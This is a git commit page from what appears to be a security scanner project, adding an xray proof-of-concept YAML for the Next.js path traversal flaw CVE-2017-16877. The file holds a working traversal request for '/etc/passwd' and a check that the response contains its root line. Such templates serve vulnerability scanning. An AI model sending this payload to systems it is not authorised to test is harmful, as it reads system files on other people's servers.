优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
+13
View File
@@ -0,0 +1,13 @@
name: poc-yaml-nextjs-cve-2017-16877
rules:
- method: GET
path: /_next/../../../../../../../../../../etc/passwd
follow_redirects: false
expression: >
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
version: <2.4.1
author: Loneyer
links:
- https://github.com/Loneyers/vuldocker/tree/master/next.js
- https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9